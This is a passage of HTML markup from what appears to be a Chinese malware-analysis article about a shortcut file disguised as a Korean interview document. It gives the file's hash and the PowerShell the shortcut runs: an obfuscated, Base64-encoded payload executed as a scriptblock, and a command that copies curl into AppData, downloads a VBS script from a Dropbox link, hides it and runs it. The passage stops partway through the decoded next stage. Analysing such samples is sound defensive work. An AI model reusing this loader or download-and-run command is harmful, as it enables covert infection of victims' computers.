sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“</span></font><font face="Malgun Gothic"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">중국</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"> CMG </span><font face="Malgun Gothic"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">인터뷰</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">.docx.lnk</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">”(中国</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"> CMG 访谈.docx.lnk)</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">，具体信息如下：</span></font></font></p><div><div><p><table style="width: 575px;"><tbody><tr><td data-colwidth="146"><p><span style="font-size: 16px;"><span style="border-color: rgb(0, 0, 0);font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">MD5</span></span></span></p></td><td data-colwidth="429"><p><span style="font-size: 16px;"><span style="border-color: rgb(0, 0, 0);font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">ba8e682a72c6a3e634c070f0fb057bf5</span></span></span></p></td></tr><tr><td data-colwidth="146"><p><span style="font-size: 16px;"><span style="border-color: rgb(0, 0, 0);font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">文件大小</span></span></span></p></td><td data-colwidth="429"><p><span style="font-size: 16px;"><span style="border-color: rgb(0, 0, 0);font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">156 KB (159,744 字节)</span></span></span></p></td></tr><tr><td data-colwidth="146"><p data-mpa-action-id="mp3otiugmmd"><span style="font-size: 16px;"><span style="border-color: rgb(0, 0, 0);font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">文件名</span></span></span></p></td><td data-colwidth="429"><p data-mpa-action-id="mp3otrdb1xut"><span style="" data-pm-slice="0 0 []"><font><span style="font-size: 16px;"><span style="border-color: rgb(0, 0, 0);font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">중국</span></span></span></font></span><span style="font-size: 16px;"><span style="border-color: rgb(0, 0, 0);font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""> CMG </span></span></span><span style=""><font><span style="font-size: 16px;"><span style="border-color: rgb(0, 0, 0);font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">인터뷰</span></span></span></font></span><span style="font-size: 16px;"><span style="border-color: rgb(0, 0, 0);font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">.docx.lnk</span></span></span></p></td></tr></tbody></table></p></div></div><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;" data-pm-slice="0 0 []"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">受害者一旦点击运行</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“</span></font><font face="Malgun Gothic"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">중국</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"> CMG </span><font face="Malgun Gothic"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">인터뷰</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">.docx.lnk”</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">文件，便会通过</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Power</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">S</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">hell执行如下脚本:</span></font></p><div><div><p><table style="min-width: 25px;"><tbody><tr><td><p data-pm-slice="0 0 []" data-mpa-action-id="mp3ou93z1fza"><span style="font-family: 仿宋;font-size: 9pt;"><span style="font-weight: bold;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mp3ou93fmlo"><span leaf=""><span textstyle="" style="font-weight: normal;">$se=&#39;MJQye[D&lt;PGvnf5kyfKEsepf&lt;M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn&lt;Mlkq\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn&lt;MJ8ygJoph[{6dJY|]V4y\pso\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep&lt;3dZ]8R}zmWpY6LIQ3hZ{oL}7nep&lt;3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX&lt;ldpYmgFDwU[kz\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep&lt;3dZ]8NVo:MJQye[D&lt;PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\9YYQIXoEVW3]MWHX:SFQMWnoXVVP.MKQ4epUkhW3nf6Yx]JI8N|gf\[Ez]JI3\Y{ve5QkeI{3]Z4zM}v;L38og|EWgKov]VP.MJ8ygJophW4K][TwT5kseJUMgJYwLF4T\[UrLFU}gZ8n\[njOYMo\6Y|f5XjOX]seKUoflDtOp{xd6{6dJY|]V4y\pso\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK4;Up&lt;|UZImdF4S\pso\6U:MI;xUqYveH8keZY&lt;iIQoeJYmgF4S\pso\6TjOX]sfqQ3LGH:SFQMWnoXVVP.MJ4yepwohW3nep&lt;3dZ]8iWv;L3QSWXvmSlUydZz&lt;MJ8ygJophV8}gZM}gKMsepfrPFznep&lt;3dZ]8Op{oepg3dF33NWvng5o|]W4eX6o}gJYwOnoSOnMsepI|hYMo\ZUofo39Rp8og|keX6o}gJYwOnoSOn]seJYgRmsyfJYxNFUxe6Us]qnvZ4Q8f6UoeV8MW|8JdZ{oWZ&lt;n]Y39Rn&lt;z]Z7vZ4Q8f6UoeV8MW|8JdZ{oTZQm][Q}[Wr9XpYk]F{eX6o}gJYwOnoSOn]seJYWdJI|]Y39RoMo\ZTsNWv;L3oRVYUML}83fqo:MKgsfpXxTpI}]YQ3fpYkeV8W]ZYuNGE7PGDzPGIFQWjvZ4Q8f6UoeV8MW|8W]ZYuW6Ms]5ox[Wr9TpYqdZ7sR|U}ep&lt;6SVU6d[MoOoMo\ZUFh[Uof|jzhGD5RWf|NWw&lt;]pox\Z{vh[vng5o|]V8GeJ&lt;}]VjsiWv;L3QSWXvmSlUleJImd}3zR|UmdJIsfm3zR|Ule5U8SVU}ep&lt;6OpQygZ83R6grdZ{oLFjn\p{k\5vjOZ{3LFUle5U8N[vn\5ksfKEofm3zhGL5R|Un\[UoSVjn\5ksfKEoflvn\p{k\5voPlnoPKj{PGD:MKQxe6geMJMv\ZQu[W3nf58yg4vn\p{k\5wgLF4lhJ&lt;|LFUn\[UoR|UleJImd|vuiWv;L3QSWXvmSowWh[Q3]Z3xVX;xUpov]Y39Rog|d[UoTZ{vTqo3][PrMJ&lt;seFznf58yg|n:SFQMWnoXVVP.dZ\rMJQye[DjOZY{LGHsh|Ule5&lt;uSVUydZ{&lt;]Z{}][vn\p&lt;yd}3qOozqN|UydZ{&lt;R|\jMJMye5v:fpYwe6]oOZo3]Z3jO[EkgJjjMJ4yepwohVDw]p&lt;|\5X:SFQMWnoXVVP.&#39;;</span></span></span></span></p><p data-mpa-action-id="mp3ou93zka1"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3ou93f1shk"><span leaf=""><span textstyle="" style="font-weight: normal;">$key=3;</span></span></span></p><p data-mpa-action-id="mp3ou93z12xq"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3ou93fncc"><span leaf=""><span textstyle="" style="font-weight: normal;">for($i=0;$i -le $se.Length;$i++)</span></span></span></p><p data-mpa-action-id="mp3ou93zrmh"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3ou93fdyw"><span leaf=""><span textstyle="" style="font-weight: normal;">{</span></span></span></p><p data-mpa-action-id="mp3ou93zcir"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3ou93f3vu"><span leaf=""><span textstyle="" style="font-weight: normal;">$v+=[System.Text.Encoding]::ASCII.GetString($se[$i]-3)</span></span></span></p><p data-mpa-action-id="mp3ou93zujk"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3ou93f23k4"><span leaf=""><span textstyle="" style="font-weight: normal;">};</span></span></span></p><p data-mpa-action-id="mp3ou93zcrn"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3ou93f1cly"><span leaf=""><span textstyle="" style="font-weight: normal;">$b = [System.Convert]::FromBase64String($v);</span></span></span></p><p data-mpa-action-id="mp3ou93z1ci6"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3ou93f13m3"><span leaf=""><span textstyle="" style="font-weight: normal;">$c = [System.Text.Encoding]::UTF8.GetString($b);</span></span></span></p><p data-mpa-action-id="mp3ou93z1pxa"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3ou93fjk9"><span leaf=""><span textstyle="" style="font-weight: normal;">$c;</span></span></span></p><p data-mpa-action-id="mp3ou93ztv8"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3ou93f1bby"><span leaf=""><span textstyle="" style="font-weight: normal;">$sb = [scriptblock]::Create($c);</span></span></span></p><p data-mpa-action-id="mp3ou93zdx2"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3ou93f1g7f"><span leaf=""><span textstyle="" style="font-weight: normal;">&amp; $sb;</span></span></span></p><p style="word-break: break-all;" data-mpa-action-id="mp3ou93z1x2f"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3ou93f1olj"><span leaf=""><span textstyle="" style="font-weight: normal;">&#34;&amp;cd /d &#34;%appdata%\Microsoft\MMC&#34; &amp; copy c:\windows\system32\curl.exe TMP0392.exe &amp; TMP0392.exe -k -L -o taskschd.vbs &#34;<a href="https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7e&amp;st=ip1rnvm2&amp;dl=0" target="_blank">https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7e&amp;st=ip1rnvm2&amp;dl=0</a>&#34;</span></span></span></p><p style="word-break: break-all;" data-mpa-action-id="mp3ou93zq3t"><span style="font-family: 仿宋;font-size: 9pt;"><span style="font-weight: bold;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mp3ou93f1e75"><span leaf=""><span textstyle="" style="font-weight: normal;">&amp;attrib +h taskschd.vbs &amp;taskschd.vbs&amp;exit</span></span></span></span></p></td></tr></tbody></table></p></div></div><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;" data-pm-slice="0 0 []"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">这段脚本主要有两个功能。第一个功能是打开伪装文档。具体是这样的：首先将硬编码的变量</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">$se</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">每个字符</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">A</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">SCII</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">编码值减去</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">3，然后进行Base</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">64</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">解码，最终执行得到</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">U</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">TF-8</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">编码的下一阶段脚本，解码后的脚本如下。</span></font></p><div><div><p><table style="min-width: 25px;"><tbody><tr><td><p style="" data-pm-slice="0 0 []" data-mpa-action-id="mp3oumwp6h6"><span style="font-family: 仿宋;font-size: 9pt;"><span style="font-weight: bold;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mp3oumw5kco"><span leaf=""><span textstyle="" style="font-weight: normal;">$comp=0;</span></span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1kvx"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw5hfs"><span leaf=""><span textstyle="" style="font-weight: normal;">$shopping=&#39;length&#39;;</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp250o"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw5zyj"><span leaf=""><span textstyle="" style="font-weight: normal;">$sunday=Get-Location;</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1mew"><span mpa-font-style="mp3oumw51nom" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">$notify=&amp;(gcm *et-Child*) *.lnk; </span></span></span><span style="font-size: 9pt;"><font><span leaf=""><span textstyle="" style="font-weight: normal;">/</span></span></font></span><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">/</span></span></span><span style="font-size: 9pt;"><font><span leaf=""><span textstyle="" style="font-weight: normal;">查找</span></span></font></span><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">lnk</span></span></span><span style="font-size: 9pt;"><font><span leaf=""><span textstyle="" style="font-weight: normal;">文件</span></span></font></span></span></p><p style="" data-mpa-action-id="mp3oumwpi6m"><span mpa-font-style="mp3oumw52114" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans 